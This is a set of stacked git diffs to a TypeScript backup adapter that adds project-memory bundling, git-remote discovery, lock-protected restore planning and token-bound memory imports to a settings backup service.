-              "INVALID_BACKUP",
-              "The approved project import no longer matches the backup"
-            );
-          }
-          const targetDir = projectMemoryDirName(importOptions.targetPath);
-          const writes = bundleEntryFiles(bundle.files, entry).map((file) => ({
-            path: rekeyProjectMemoryPath(file.path, targetDir),
-            content: file.content,
-          }));
           const { written, skipped } = await withMemoryLock(() =>
-            writeProjectMemoryFiles(muxRoot, writes, { addOnly: true })
+            writeProjectMemoryFiles(muxRoot, rekeyedWrites(importOptions), { addOnly: true })
           );
           return { writtenFiles: written, skippedFiles: skipped };
         },

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -359,9 +359,13 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       plan: planProjectBundleRestore(
         bundle,
         registered,
-        await readProjectMemoryOrigins(muxRoot, registered)
+        await readProjectMemoryOrigins(muxRoot, registered, bundleSourcePaths(bundle))
       ),
     };
+  }
+
+  function bundleSourcePaths(bundle: BackupProjectBundle): string[] {
+    return bundle.manifest.projects.map((entry) => entry.path);
   }
 
   /** Restore-preview statuses for matched entries, diffed against the local memory files. */
@@ -686,7 +690,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
             const plan = planProjectBundleRestore(
               bundle,
               registered,
-              await readProjectMemoryOrigins(muxRoot, registered)
+              await readProjectMemoryOrigins(muxRoot, registered, bundleSourcePaths(bundle))
             );
             const matched = plan.matched.filter((match) => validatedMatched.has(planKey(match)));
             // A validated match that no longer writes — its project unregistered since, or

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -278,10 +278,42 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
     );
   }
 
+  /**
+   * The registered projects the bundle can carry: user projects (system entries keep no
+   * memory) whose path fits the manifest schema — registration itself caps nothing, and a
+   * path past the cap has no valid manifest entry; such a project stays local rather than
+   * failing every push for all the others, and counts toward nothing here (the entry cap,
+   * remote discovery) since it will not be in the bundle.
+   */
   function userProjects(): Array<[string, ProjectConfig]> {
     return [...options.config.loadConfigOrDefault().projects.entries()].filter(
-      ([projectPath, projectConfig]) => !isSystemProjectEntry(projectPath, projectConfig)
+      ([projectPath, projectConfig]) =>
+        !isSystemProjectEntry(projectPath, projectConfig) &&
+        projectPath.length <= MAX_BACKUP_PROJECT_PATH_CHARS
     );
+  }
+
+  /** The user projects userProjects leaves out, for saying so once per export. */
+  function unsupportedUserProjects(): string[] {
+    return [...options.config.loadConfigOrDefault().projects.entries()]
+      .filter(
+        ([projectPath, projectConfig]) =>
+          !isSystemProjectEntry(projectPath, projectConfig) &&
+          projectPath.length > MAX_BACKUP_PROJECT_PATH_CHARS
+      )
+      .map(([projectPath]) => projectPath);
+  }
+
+  /**
+   * The registry as a remote-discovery pass saw it. Remote hints are keyed by path and found
+   * outside the registration lock; a project removed and another registered at the same path
+   * during discovery would otherwise carry the removed project's remote into the new
+   * project's entry. The listing under the lock uses the hints only if the registry has not
+   * changed since — conservatively, since config records no registration identity: churn
+   * anywhere in the project set costs this export its hints, never gives an entry a wrong one.
+   */
+  function registrySnapshot(): string {
+    return JSON.stringify(userProjects());
   }
 
   /**
@@ -291,7 +323,16 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
    * whole pass caps the wait regardless of the project count. Projects probed after the
    * deadline simply record no remote.
    */
-  async function discoverProjectRemotes(): Promise<Map<string, string | undefined>> {
+  async function discoverProjectRemotes(): Promise<{
+    remotes: Map<string, string | undefined>;
+    registry: string;
+  }> {
+    for (const projectPath of unsupportedUserProjects()) {
+      log.warn(
+        `Settings backup: not backing up project '${projectPath.slice(0, 80)}…': its path is longer than ${MAX_BACKUP_PROJECT_PATH_CHARS} characters`
+      );
+    }
+    const registry = registrySnapshot();
     const projects = userProjects();
     // Before any lookup: an over-limit config would otherwise run every remote probe
     // only to be refused by the bundle collector afterwards.
@@ -317,7 +358,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         }
       })
     );
-    return remotes;
+    return { remotes, registry };
   }
 
   /**
@@ -329,24 +370,21 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
    * discovery began; a project added since carries no remote hint, one removed since is
    * gone along with its memory.
    */
-  function listProjectBundleEntries(
-    remotes: ReadonlyMap<string, string | undefined>
-  ): BackupProjectBundleEntry[] {
-    // A registered path past the manifest schema's cap — registration itself caps nothing —
-    // has no valid manifest entry, and one such project must not fail every push for all
-    // the others; it stays local, logged, exactly as an import of it would be refused.
-    const projects = userProjects().filter(([projectPath]) => {
-      if (projectPath.length <= MAX_BACKUP_PROJECT_PATH_CHARS) return true;
-      log.warn(
-        `Settings backup: not backing up project '${projectPath.slice(0, 80)}…': its path is longer than ${MAX_BACKUP_PROJECT_PATH_CHARS} characters`
-      );
-      return false;
-    });
+  function listProjectBundleEntries(discovered: {
+    remotes: ReadonlyMap<string, string | undefined>;
+    registry: string;
+  }): BackupProjectBundleEntry[] {
+    const projects = userProjects();
     if (projects.length > MAX_BACKUP_PROJECT_ENTRIES) {
       throw new Error(`Backup has more than ${MAX_BACKUP_PROJECT_ENTRIES} projects`);
     }
+    // See registrySnapshot: hints found for a registry that has since changed are dropped.
+    const remotes = discovered.registry === registrySnapshot() ? discovered.remotes : null;
+    if (remotes === null) {
+      log.debug("Settings backup: projects changed during remote discovery; omitting remote hints");
+    }
     return projects.map(([projectPath, projectConfig]) => {
-      const gitRemote = remotes.get(projectPath);
+      const gitRemote = remotes?.get(projectPath);
       return {
         path: projectPath,
         // Clamped to the manifest schema's cap so a long custom title cannot produce a
@@ -437,7 +475,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       // fresh after the core payload.
       let scanFiles = payload.files;
       if (exportOptions.includeProjects) {
-        const remotes = await discoverProjectRemotes();
+        const discovered = await discoverProjectRemotes();
         // The project list is read, the memory collected, and the bundle written under the
         // registration lock (taken before the memory lock, the fixed order), so a project
         // registered or removed during the seconds of remote discovery above is reflected
@@ -445,7 +483,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         // is collected under the memory lock so an agent writing memory mid-export cannot
         // produce a torn bundle or trip the collector's identity checks.
         const bundle = await withProjectRegistrationLock(muxRoot, async (registration) => {
-          const entries = listProjectBundleEntries(remotes);
+          const entries = listProjectBundleEntries(discovered);
           const collected = await withMemoryLock(() =>
             collectProjectBundle(
               muxRoot,

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -2,8 +2,22 @@ import * as path from "node:path";
 import { listBackupManagedPathSpellings } from "@/common/compat/legacyMux";
 import { VERSION } from "@/version";
 import type { Config } from "@/node/config";
-import type { BackupFileChange } from "@/common/orpc/schemas/backup";
+import type { BackupFileChange, BackupProjectImport } from "@/common/orpc/schemas/backup";
 import { normalizeUserPreferences } from "@/common/config/schemas/userPreferences";
+import {
+  sanitizeBackupGitRemote,
+  type BackupProjectBundleEntry,
+} from "@/common/config/schemas/settingsBackup";
+import { MULTI_PROJECT_CONFIG_KEY } from "@/common/constants/multiProject";
+import { SCRATCH_PROJECT_CONFIG_KEY } from "@/common/constants/scratch";
+import type { ProjectConfig } from "@/common/types/project";
+import { getProjectDisplayName } from "@/common/utils/subProjects";
+import { projectMemoryDirName } from "@/node/services/memoryService";
+import {
+  memoryMutationLockKey,
+  withTargetMutationLock,
+} from "@/node/services/refinement/targetMutationLocks";
+import { execFileAsync } from "@/node/utils/disposableExec";
 import {
   BackupServiceError,
   type BackupGitRepo,
@@ -13,8 +27,18 @@ import {
 import { BACKUP_GIT_TIMEOUT_MS } from "@/constants/terminationTimeouts";
 import { BackupRepoCache } from "./gitRepo";
 import {
+  PROJECT_BUNDLE_DIR,
   backupPayloadExists,
+  bundleEntryFiles,
+  collectProjectBundle,
+  planProjectBundleRestore,
+  projectBundleExists,
+  projectImportToken,
+  readProjectBundle,
+  rekeyProjectMemoryPath,
   resolveContainedPath,
+  writeProjectBundle,
+  writeProjectMemoryFiles,
   assertBackupCommandsApproved,
   collectMcpCommandApprovals,
   resolveRestoredContent,
@@ -31,6 +55,8 @@ import {
   serializeBackupPreferences,
   writeBackupPayload,
   type BackupFile,
+  type BackupProjectBundle,
+  type ProjectBundleRestorePlan,
 } from "./payload";
 
 /**
@@ -162,6 +188,21 @@ function describeMissingBackup(managedPath: string): string {
     : `No Xum backup found in '${managedPath}' or legacy ${fallbacks} on this branch`;
 }
 
+/** Best-effort: a missing origin, a non-git directory, or a hung git must never fail an export. */
+async function readProjectGitRemote(projectPath: string): Promise<string | undefined> {
+  try {
+    using gitProcess = execFileAsync("git", ["-C", projectPath, "remote", "get-url", "origin"], {
+      timeoutMs: 5_000,
+      maxOutputBytes: 64 * 1024,
+      killTreeOnTermination: true,
+    });
+    const { stdout } = await gitProcess.result;
+    return sanitizeBackupGitRemote(stdout.trim());
+  } catch {
+    return undefined;
+  }
+}
+
 export function createBackupPayloadStore(options: { config: Config }): BackupPayloadStore {
   const muxRoot = options.config.rootDir;
 
@@ -197,22 +238,132 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
     });
   }
 
+  /**
+   * The same lock MemoryService mutations take (its project stores resolve to the shared
+   * `<muxRoot>/memory` key), so backup never becomes an uncoordinated memory writer.
+   */
+  function withMemoryLock<T>(operation: () => Promise<T>): Promise<T> {
+    return withTargetMutationLock(
+      muxRoot,
+      memoryMutationLockKey(muxRoot, path.join(muxRoot, "memory")),
+      operation
+    );
+  }
+
+  function isSystemProjectEntry(projectPath: string, projectConfig: ProjectConfig): boolean {
+    return (
+      projectPath === MULTI_PROJECT_CONFIG_KEY ||
+      projectPath === SCRATCH_PROJECT_CONFIG_KEY ||
+      projectConfig.projectKind === "system"
+    );
+  }
+
+  function userProjects(): Array<[string, ProjectConfig]> {
+    return [...options.config.loadConfigOrDefault().projects.entries()].filter(
+      ([projectPath, projectConfig]) => !isSystemProjectEntry(projectPath, projectConfig)
+    );
+  }
+
+  /**
+   * Every user project becomes an entry, including zero-memory ones: the project list is
+   * half the feature. `memoryDir` records this install's actual directory name, which is
+   * also what restore-side matching recomputes.
+   */
+  async function listProjectBundleEntries(entryOptions: {
+    withRemotes: boolean;
+  }): Promise<BackupProjectBundleEntry[]> {
+    const entries: BackupProjectBundleEntry[] = [];
+    for (const [projectPath, projectConfig] of userProjects()) {
+      const gitRemote = entryOptions.withRemotes
+        ? await readProjectGitRemote(projectPath)
+        : undefined;
+      entries.push({
+        path: projectPath,
+        name: getProjectDisplayName(projectPath, projectConfig),
+        ...(gitRemote !== undefined ? { gitRemote } : {}),
+        memoryDir: projectMemoryDirName(projectPath),
+      });
+    }
+    return entries;
+  }
+
+  function registeredProjectDirs(): Map<string, string> {
+    return new Map(
+      userProjects().map(([projectPath]) => [projectPath, projectMemoryDirName(projectPath)])
+    );
+  }
+
+  function toProjectImports(plan: ProjectBundleRestorePlan): BackupProjectImport[] {
+    return plan.imports.map(({ entry, files, token }) => ({
+      sourcePath: entry.path,
+      name: entry.name,
+      ...(entry.gitRemote !== undefined ? { gitRemote: entry.gitRemote } : {}),
+      memoryFileCount: files.length,
+      token,
+    }));
+  }
+
+  async function readBundleWithPlan(
+    sourceDir: string
+  ): Promise<{ bundle: BackupProjectBundle; plan: ProjectBundleRestorePlan } | null> {
+    const bundle = await readProjectBundle(sourceDir);
+    if (bundle === null) return null;
+    return { bundle, plan: planProjectBundleRestore(bundle, registeredProjectDirs()) };
+  }
+
+  /** Restore-preview statuses for matched entries, diffed against the local memory files. */
+  async function matchedProjectChanges(
+    plan: ProjectBundleRestorePlan
+  ): Promise<BackupFileChange[]> {
+    if (plan.matched.length === 0) return [];
+    const localBundle = await collectProjectBundle(
+      muxRoot,
+      plan.matched.map((match) => match.entry)
+    );
+    const localByPath = new Map(localBundle.files.map((file) => [file.path, file]));
+    const changes: BackupFileChange[] = [];
+    for (const match of plan.matched) {
+      for (const file of match.files) {
+        const existing = localByPath.get(file.path);
+        if (existing === undefined) {
+          changes.push({ status: "A", path: file.path });
+        } else if (!existing.content.equals(file.content)) {
+          changes.push({ status: "M", path: file.path });
+        }
+      }
+    }
+    return changes;
+  }
+
   return {
     async exportTo(exportOptions) {
       const payload = await buildPayload();
+      const destination = await managedDir(exportOptions.repositoryRoot, exportOptions.managedPath);
       // Owner-only like the safety snapshot: the export copies allowlisted sources that may
       // themselves be owner-only, and it lands here before the secret scan has said anything
       // about it. Git records only the exec bit, so the modes never reach the remote.
-      await writeBackupPayload(
-        await managedDir(exportOptions.repositoryRoot, exportOptions.managedPath),
-        payload,
-        { ownerOnly: true }
-      );
-      const secretFiles = scanBackupFilesForSecrets(payload.files);
+      await writeBackupPayload(destination, payload, { ownerOnly: true });
+      // The core write wiped the whole managed path, so with the toggle off a previously
+      // pushed bundle disappears from the next tree, and with it on the sidecar is written
+      // fresh after the core payload.
+      let scanFiles = payload.files;
+      if (exportOptions.includeProjects) {
+        const bundle = await collectProjectBundle(
+          muxRoot,
+          await listProjectBundleEntries({ withRemotes: true })
+        );
+        await writeProjectBundle(path.join(destination, PROJECT_BUNDLE_DIR), bundle, {
+          ownerOnly: true,
+        });
+        // One scan and one digest over core and bundle files together, so the secret gate
+        // and its approval bind the exact combined payload a push would publish.
+        scanFiles = [...payload.files, ...bundle.files];
+      }
+      const secretFiles = scanBackupFilesForSecrets(scanFiles);
       return {
         redactions: payload.redactions,
         secretFiles,
-        secretApproval: backupSecretApprovalDigest(payload.files, secretFiles),
+        secretApproval: backupSecretApprovalDigest(scanFiles, secretFiles),
       };
     },
 
@@ -222,7 +373,13 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       // A repository with no backup yet is a normal first-run state, not an error:
       // nothing would be restored, and every local file is local-only.
       if (!(await backupPayloadExists(sourceDir))) {
-        return { changes: [], localOnlyFiles: [...local.keys()].sort(), commandApprovals: [] };
+        return {
+          changes: [],
+          localOnlyFiles: [...local.keys()].sort(),
+          commandApprovals: [],
+          projectImports: [],
+          projectBundleSkipped: false,
+        };
       }
 
       const payload = await readBackupPayload(sourceDir);
@@ -270,6 +427,20 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
           changes.push({ status: "M", path: file.path });
         }
       }
+
+      let projectImports: BackupProjectImport[] = [];
+      let projectBundleSkipped = false;
+      if (!previewOptions.includeProjects) {
+        // Existence-only: with the toggle off the sidecar is never parsed, so a malformed
+        // bundle cannot block a core-only preview.
+        projectBundleSkipped = await projectBundleExists(sourceDir);
+      } else {
+        const bundlePlan = await readBundleWithPlan(sourceDir);
+        if (bundlePlan !== null) {
+          projectImports = toProjectImports(bundlePlan.plan);
+          changes.push(...(await matchedProjectChanges(bundlePlan.plan)));
+        }
+      }
       return {
         changes: changes.sort((a, b) => a.path.localeCompare(b.path)),
         localOnlyFiles: localOnly,
@@ -278,6 +449,8 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
           payload.files,
           payload.manifest.mcpRedactions
         ),
+        projectImports,
+        projectBundleSkipped,
       };
     },
 
@@ -300,21 +473,42 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       // The same preflight the restore runs, so a payload it would refuse is refused here,
       // before the caller takes a safety snapshot it would have no use for.
       await planRestoreWrites(muxRoot, payload);
+      if (!validateOptions.includeProjects) {
+        return { hasProjectBundle: false, projectImports: [] };
+      }
+      // A bundle the restore would refuse is refused here too, for the same reason.
+      const bundlePlan = await readBundleWithPlan(sourceDir);
+      if (bundlePlan === null) {
+        return { hasProjectBundle: false, projectImports: [] };
+      }
+      return { hasProjectBundle: true, projectImports: toProjectImports(bundlePlan.plan) };
     },
 
-    async writeSafetySnapshot(snapshotRoot) {
+    async writeSafetySnapshot(snapshotRoot, snapshotOptions) {
       // Unredacted: this copy never leaves the machine, and a redacted snapshot could
       // not restore a credential whose MCP server the restore removed.
       await writeBackupPayload(snapshotRoot, await buildPayload({ keepLocalSecrets: true }), {
         portable: false,
         ownerOnly: true,
       });
+      if (snapshotOptions.includeProjectMemory) {
+        // Registered projects only: an import that lands at a previously unregistered
+        // target writes add-only and reports every created file, so the snapshot's job is
+        // covering the memory a matched restore can overwrite.
+        const bundle = await collectProjectBundle(
+          muxRoot,
+          await listProjectBundleEntries({ withRemotes: false })
+        );
+        await writeProjectBundle(path.join(snapshotRoot, PROJECT_BUNDLE_DIR), bundle, {
+          portable: false,
+          ownerOnly: true,
+        });
+      }
     },
 
     async restore(restoreOptions) {
-      const payload = await readBackupPayload(
-        await managedDir(restoreOptions.repositoryRoot, restoreOptions.managedPath)
-      );
+      const sourceDir = await managedDir(restoreOptions.repositoryRoot, restoreOptions.managedPath);
+      const payload = await readBackupPayload(sourceDir);
       const before = await localFilesByPath();
       const result = await restoreBackupPayload({
         muxRoot,
@@ -354,9 +548,64 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
           const previous = before.get(file);
           return !previous?.content.equals(current.content) || !sameMode(previous, current);
         })
-        .map(([file]) => file)
-        .sort();
-      return { changedFiles, localOnlyFiles: result.localOnlyFiles };
+        .map(([file]) => file);
+
+      let projectBundleSkipped = false;
+      if (!restoreOptions.includeProjects) {
+        // Existence-only, like the preview: a malformed sidecar must never block a
+        // core-only restore, but its presence is reported so the skip is visible.
+        projectBundleSkipped = await projectBundleExists(sourceDir);
+      } else {
+        const bundlePlan = await readBundleWithPlan(sourceDir);
+        if (bundlePlan !== null) {
+          // Matched entries restore verbatim, exactly what the preview promised. Imports
+          // are executed separately by the service, after project registration.
+          const writes = bundlePlan.plan.matched.flatMap((match) =>
+            match.files.map((file) => ({ path: file.path, content: file.content }))
+          );
+          const { written } = await withMemoryLock(() =>
+            writeProjectMemoryFiles(muxRoot, writes, { addOnly: false })
+          );
+          changedFiles.push(...written);
+        }
+      }
+      return {
+        changedFiles: changedFiles.sort(),
+        localOnlyFiles: result.localOnlyFiles,
+        projectBundleSkipped,
+      };
+    },
+
+    async importProjectMemory(importOptions) {
+      const sourceDir = await managedDir(importOptions.repositoryRoot, importOptions.managedPath);
+      const bundle = await readProjectBundle(sourceDir);
+      if (bundle === null) {
+        throw new BackupServiceError(
+          "INVALID_BACKUP",
+          "The backup no longer carries a project bundle"
+        );
+      }
+      // Token lookup rather than trusting any caller-named entry: the token binds the
+      // approval to the exact entry and content, and the repo lock has held the checkout
+      // stable since the service validated it, so a miss here is defensive only.
+      const entry = bundle.manifest.projects.find(
+        (candidate) => projectImportToken(candidate, bundle.files) === importOptions.token
+      );
+      if (entry === undefined) {
+        throw new BackupServiceError(
+          "INVALID_BACKUP",
+          "The approved project import no longer matches the backup"
+        );
+      }
+      const targetDir = projectMemoryDirName(importOptions.targetPath);
+      const writes = bundleEntryFiles(bundle.files, entry).map((file) => ({
+        path: rekeyProjectMemoryPath(file.path, targetDir),
+        content: file.content,
+      }));
+      const { written, skipped } = await withMemoryLock(() =>
+        writeProjectMemoryFiles(muxRoot, writes, { addOnly: true })
+      );
+      return { writtenFiles: written, skippedFiles: skipped };
     },
   };
 }

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -6,9 +6,11 @@ import type { BackupFileChange, BackupProjectImport } from "@/common/orpc/schema
 import { normalizeUserPreferences } from "@/common/config/schemas/userPreferences";
 import {
   MAX_BACKUP_PROJECT_ENTRIES,
+  MAX_BACKUP_PROJECT_PATH_CHARS,
   sanitizeBackupGitRemote,
   type BackupProjectBundleEntry,
 } from "@/common/config/schemas/settingsBackup";
+import { log } from "@/node/services/log";
 import { AsyncSemaphore } from "@/node/utils/concurrency/asyncSemaphore";
 import { isSystemProjectEntry } from "@/common/utils/systemProjects";
 import type { ProjectConfig } from "@/common/types/project";
@@ -330,7 +332,16 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
   function listProjectBundleEntries(
     remotes: ReadonlyMap<string, string | undefined>
   ): BackupProjectBundleEntry[] {
-    const projects = userProjects();
+    // A registered path past the manifest schema's cap — registration itself caps nothing —
+    // has no valid manifest entry, and one such project must not fail every push for all
+    // the others; it stays local, logged, exactly as an import of it would be refused.
+    const projects = userProjects().filter(([projectPath]) => {
+      if (projectPath.length <= MAX_BACKUP_PROJECT_PATH_CHARS) return true;
+      log.warn(
+        `Settings backup: not backing up project '${projectPath.slice(0, 80)}…': its path is longer than ${MAX_BACKUP_PROJECT_PATH_CHARS} characters`
+      );
+      return false;
+    });
     if (projects.length > MAX_BACKUP_PROJECT_ENTRIES) {
       throw new Error(`Backup has more than ${MAX_BACKUP_PROJECT_ENTRIES} projects`);
     }

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -344,13 +344,11 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
     plan: ProjectBundleRestorePlan
   ): Promise<BackupFileChange[]> {
     if (plan.matched.length === 0) return [];
-    // Under the memory lock like every other backup read of project memory, so a
-    // concurrent memory edit cannot yield a torn diff or a failed identity check.
+    // Only the destinations the restore would write, under the memory lock like every
+    // other backup read of project memory: a whole-directory read would let an unrelated
+    // local-only note fail the preview, and a concurrent edit could tear the diff.
     const localBundle = await withMemoryLock(() =>
-      collectProjectBundle(
-        muxRoot,
-        plan.matched.map((match) => match.entry)
-      )
+      collectOverwritableProjectMemory(muxRoot, plan.matched)
     );
     const localByPath = new Map(localBundle.files.map((file) => [file.path, file]));
     const changes: BackupFileChange[] = [];

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -308,12 +308,15 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
    * The registry as a remote-discovery pass saw it. Remote hints are keyed by path and found
    * outside the registration lock; a project removed and another registered at the same path
    * during discovery would otherwise carry the removed project's remote into the new
-   * project's entry. The listing under the lock uses the hints only if the registry has not
-   * changed since — conservatively, since config records no registration identity: churn
-   * anywhere in the project set costs this export its hints, never gives an entry a wrong one.
+   * project's entry. The listing under the lock uses the hints only if nothing has been
+   * written to the registry since: the config file's write generation changes on every save
+   * — so a removal and a re-registration with identical config, invisible in the content, is
+   * seen — and the content is compared too. Conservative by design, since config records no
+   * per-registration identity: any write in the window costs this export its hints, never
+   * gives an entry a wrong one.
    */
-  function registrySnapshot(): string {
-    return JSON.stringify(userProjects());
+  async function registrySnapshot(): Promise<string> {
+    return `${await options.config.configFileWriteGeneration()}\0${JSON.stringify(userProjects())}`;
   }
 
   /**
@@ -332,7 +335,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         `Settings backup: not backing up project '${projectPath.slice(0, 80)}…': its path is longer than ${MAX_BACKUP_PROJECT_PATH_CHARS} characters`
       );
     }
-    const registry = registrySnapshot();
+    const registry = await registrySnapshot();
     const projects = userProjects();
     // Before any lookup: an over-limit config would otherwise run every remote probe
     // only to be refused by the bundle collector afterwards.
@@ -370,16 +373,16 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
    * discovery began; a project added since carries no remote hint, one removed since is
    * gone along with its memory.
    */
-  function listProjectBundleEntries(discovered: {
+  async function listProjectBundleEntries(discovered: {
     remotes: ReadonlyMap<string, string | undefined>;
     registry: string;
-  }): BackupProjectBundleEntry[] {
+  }): Promise<BackupProjectBundleEntry[]> {
     const projects = userProjects();
     if (projects.length > MAX_BACKUP_PROJECT_ENTRIES) {
       throw new Error(`Backup has more than ${MAX_BACKUP_PROJECT_ENTRIES} projects`);
     }
-    // See registrySnapshot: hints found for a registry that has since changed are dropped.
-    const remotes = discovered.registry === registrySnapshot() ? discovered.remotes : null;
+    // See registrySnapshot: hints found for a registry written to since are dropped.
+    const remotes = discovered.registry === (await registrySnapshot()) ? discovered.remotes : null;
     if (remotes === null) {
       log.debug("Settings backup: projects changed during remote discovery; omitting remote hints");
     }
@@ -483,7 +486,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         // is collected under the memory lock so an agent writing memory mid-export cannot
         // produce a torn bundle or trip the collector's identity checks.
         const bundle = await withProjectRegistrationLock(muxRoot, async (registration) => {
-          const entries = listProjectBundleEntries(discovered);
+          const entries = await listProjectBundleEntries(discovered);
           const collected = await withMemoryLock(() =>
             collectProjectBundle(
               muxRoot,

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -561,7 +561,9 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       // destinations) belong to the preflight too: found only inside the restore, they
       // would surface after the core settings were already overwritten.
       for (const match of bundlePlan.plan.matched) {
-        await assertProjectMemoryWritesAllowed(muxRoot, matchedProjectWrites(match));
+        await assertProjectMemoryWritesAllowed(muxRoot, matchedProjectWrites(match), {
+          addOnly: false,
+        });
       }
       // So does the recovery copy: a destination that cannot be snapshotted (a local file
       // past the backup budgets) refuses the restore here, not after the core writes. The
@@ -642,10 +644,10 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       const restoredProjectMemory: Array<{ projectPath: string; files: string[] }> = [];
       const memoryChanges: string[] = [];
       let core: { localOnlyFiles: string[] };
-      const bundlePlan = restoreOptions.includeProjects
-        ? await readBundleWithPlan(sourceDir)
-        : null;
-      if (bundlePlan === null) {
+      // The bundle itself is read here — the repo lock holds the checkout stable — but its
+      // plan is computed inside the memory lock below, where the inputs it depends on are.
+      const bundle = restoreOptions.includeProjects ? await readProjectBundle(sourceDir) : null;
+      if (bundle === null) {
         // Existence-only, like the preview: a malformed sidecar must never block a
         // core-only restore, but its presence is reported so the skip is visible.
         projectBundleSkipped =
@@ -670,17 +672,19 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         // discovered only after the core files were already overwritten, and nothing can
         // edit a file between its snapshot bytes and its overwrite.
         core = await withMemoryLock(async () => {
-          // Registration is re-read at the write boundary so a project unregistered since
-          // the plan was computed is left alone. Project registration is not serialized
-          // with memory writes (config edits take no memory lock), so this is the
-          // narrowest check available, not a guarantee against a concurrent edit landing
-          // between this read and the write.
+          // The plan is recomputed at the write boundary, from registration and the origin
+          // markers as they are now. Origin markers are written under this same lock (by an
+          // import), so a project re-pointed at another source since validation no longer
+          // matches the old entry here. Project registration is not serialized with memory
+          // writes (config edits take no memory lock), so for it this is the narrowest check
+          // available, not a guarantee against a concurrent edit landing before the write.
           const registered = registeredProjectDirs();
-          const matched = bundlePlan.plan.matched.filter(
-            (match) =>
-              validatedMatched.has(planKey(match)) &&
-              registered.get(match.projectPath) === match.localMemoryDir
+          const plan = planProjectBundleRestore(
+            bundle,
+            registered,
+            await readProjectMemoryOrigins(muxRoot, registered)
           );
+          const matched = plan.matched.filter((match) => validatedMatched.has(planKey(match)));
           // A validated match that no longer writes — its project unregistered since, or
           // resolved to a different local project now — is refused rather than dropped:
           // the caller reports unapproved candidates from its validation, so a silently
@@ -699,7 +703,9 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
           }
           if (matched.length > 0) {
             for (const match of matched) {
-              await assertProjectMemoryWritesAllowed(muxRoot, matchedProjectWrites(match));
+              await assertProjectMemoryWritesAllowed(muxRoot, matchedProjectWrites(match), {
+                addOnly: false,
+              });
             }
             // Exactly the files these writes can overwrite: not whole project directories,
             // whose unrelated local-only notes neither need covering nor may fail the
@@ -798,7 +804,9 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       };
       return {
         async assertProjectMemoryAllowed(importOptions) {
-          await assertProjectMemoryWritesAllowed(muxRoot, rekeyedWrites(importOptions));
+          await assertProjectMemoryWritesAllowed(muxRoot, rekeyedWrites(importOptions), {
+            addOnly: true,
+          });
         },
         async importProjectMemory(importOptions) {
           const entry = entryFor(importOptions.token);

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -280,45 +280,68 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
   }
 
   /**
-   * Every user project becomes an entry, including zero-memory ones: the project list is
-   * half the feature. `memoryDir` records this install's actual directory name, which is
-   * also what restore-side matching recomputes.
+   * Remote hints for the registered user projects, discovered outside any lock: each probe
+   * has its own timeout, so sequential discovery over many projects on slow filesystems
+   * could stall a preview or push for minutes; bounded parallelism plus one deadline for the
+   * whole pass caps the wait regardless of the project count. Projects probed after the
+   * deadline simply record no remote.
    */
-  async function listProjectBundleEntries(): Promise<BackupProjectBundleEntry[]> {
+  async function discoverProjectRemotes(): Promise<Map<string, string | undefined>> {
     const projects = userProjects();
     // Before any lookup: an over-limit config would otherwise run every remote probe
     // only to be refused by the bundle collector afterwards.
     if (projects.length > MAX_BACKUP_PROJECT_ENTRIES) {
       throw new Error(`Backup has more than ${MAX_BACKUP_PROJECT_ENTRIES} projects`);
     }
-    // Each probe has its own timeout, so sequential discovery over many projects on slow
-    // filesystems could stall a preview or push for minutes; bounded parallelism plus one
-    // deadline for the whole pass caps the wait regardless of the project count. Projects
-    // probed after the deadline simply record no remote.
     const probes = new AsyncSemaphore(REMOTE_DISCOVERY_CONCURRENCY);
     const deadline = Date.now() + REMOTE_DISCOVERY_DEADLINE_MS;
-    return await Promise.all(
-      projects.map(async ([projectPath, projectConfig]) => {
+    const remotes = new Map<string, string | undefined>();
+    await Promise.all(
+      projects.map(async ([projectPath]) => {
         const slot = await probes.acquire();
-        let gitRemote: string | undefined;
         try {
-          gitRemote = await readProjectGitRemote(
+          remotes.set(
             projectPath,
-            Math.min(REMOTE_PROBE_TIMEOUT_MS, deadline - Date.now())
+            await readProjectGitRemote(
+              projectPath,
+              Math.min(REMOTE_PROBE_TIMEOUT_MS, deadline - Date.now())
+            )
           );
         } finally {
           slot.release();
         }
-        return {
-          path: projectPath,
-          // Clamped to the manifest schema's cap so a long custom title cannot produce a
-          // bundle this build's own restore would refuse.
-          name: getProjectDisplayName(projectPath, projectConfig).slice(0, 256),
-          ...(gitRemote !== undefined ? { gitRemote } : {}),
-          memoryDir: projectMemoryDirName(projectPath),
-        };
       })
     );
+    return remotes;
+  }
+
+  /**
